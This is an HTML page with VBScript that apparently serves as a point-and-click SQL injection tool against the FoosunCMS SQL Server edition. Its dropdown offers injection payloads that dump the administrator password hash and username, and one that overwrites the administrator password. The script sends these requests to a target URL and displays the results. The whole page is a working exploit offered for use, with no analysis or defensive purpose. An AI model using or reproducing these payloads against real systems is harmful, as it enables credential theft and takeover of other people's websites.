<SCRIPTLANGUAGE="VBScript">
SubWindow_onLoad
window.resizeTo450,380
window.moveTo300,300
EndSub
</SCRIPT>

<SCRIPTLANGUAGE="VBScript">
FunctiongetHTTPPage(Path)
t=GetBody(Path)
getHTTPPage=BytesToBstr(t,"GB2312")
document.getElementById("url").innerText=getHTTPPage
EndFunction
</script>
<SCRIPTLANGUAGE="VBScript">
FunctionGetBody(url)
OnErrorResumeNext
SetRetrieval=CreateObject("Microsoft.XMLHTTP")
WithRetrieval
.Open"Get",url,False,"",""
.Send
GetBody=.ResponseBody
EndWith
SetRetrieval=Nothing
EndFunction

FunctionBytesToBstr(Body,Cset)
Dimobjstream
Setobjstream=CreateObject("adodb.stream")
objstream.Type=1
objstream.Mode=3
objstream.Open
objstream.WriteBody
objstream.Position=0
objstream.Type=2
objstream.Charset=Cset
BytesToBstr=objstream.ReadText
objstream.Close
Setobjstream=Nothing
EndFunction

</script>

<title>bylcx</title>
<inputid="urlcode"NAME="urlcode"size="60"value="http://风讯url/user/setnextoptions.asp">
<selectid="sql"name="sql"onchange=vbs:getHTTPPage(document.getElementById("urlcode").value+document.getElementById("sql").value)>
<optionvalue="">风讯sql版注入，至于其它备份shell的语句懒得写了</option>
<optionvalue="?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=1--")">暴管理员密码</option>
<optionvalue="?EquValue=1&ReqSql=select%201,Admin_Name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=1--")">暴管理员用户名</option>
<optionvalue="?EquValue=1&ReqSql=selectuser;updateFS_MF_ADMINsetADMIN_pass_word='a0b923820dcc509a'whereid=1--">更改管理员密码为1</option>
</select>
<TEXTAREAid="url"NAME="url"ROWS="8"COLS="60"></TEXTAREA>